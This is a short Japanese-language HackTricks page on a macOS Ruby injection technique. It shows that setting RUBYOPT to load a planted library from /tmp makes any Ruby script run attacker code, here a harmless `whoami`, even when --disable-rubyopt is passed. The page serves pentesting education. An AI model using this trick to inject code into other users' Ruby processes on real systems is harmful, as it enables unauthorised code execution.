HackTricksmacOS Ruby Applications Injection
Reading time: 3 minutes
tip
AWSハッキングを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:
HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
RUBYOPT
この環境変数を使用すると、rubyが実行されるたびに新しいパラメータを追加することが可能です。パラメータ**-eを使用して実行するrubyコードを指定することはできませんが、-Iおよび-r**のパラメータを使用してライブラリのロードパスに新しいフォルダを追加し、ロードするライブラリを指定することができます。
ライブラリ**inject.rbを/tmp**に作成します:
inject.rb
puts `whoami`
どこにでも次のようなRubyスクリプトを作成します:
hello.rb
puts 'Hello, World!'
その後、任意のRubyスクリプトを次のように読み込ませます:
bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb
面白い事実ですが、--disable-rubyopt パラメータを使用しても動作します:
bash
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。